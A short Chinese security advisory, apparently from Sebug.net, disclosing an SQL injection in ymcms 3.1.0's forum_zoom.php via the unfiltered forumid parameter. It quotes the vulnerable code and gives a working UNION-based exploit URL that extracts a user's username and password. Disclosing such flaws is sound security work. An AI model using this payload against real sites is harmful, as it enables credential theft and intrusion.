影响版本: ymcms3.1.0 |
详细说明: forum_zoom.php 31~48行 if ($forumid != ""){ $isforum = " && forumid IN (".$forumid.") "; }else{ $isforum = ""; } //forumid明显没有过滤 …… $sql = "Select threadid, title, lastpost FROM ".$ym_thread_tab." Where isshow="1" ".$isforum." orDER BY ".$isaction." LIMIT 0, ".$shownum; 发生了注射 |
参考: misssky's BLOG |
解决方案: http://www.ymcms.com/ |
测试方法: [警 告] 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负! exp:[union] forum_zoom.php?forumid=15)%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20userid=1/* |
//Sebug.net 本安全信息由Sebug.net翻译整理,版权所有,未经许可,不得转载 |
转载于:https://www.cnblogs.com/allyesno/archive/2007/08/05/843451.html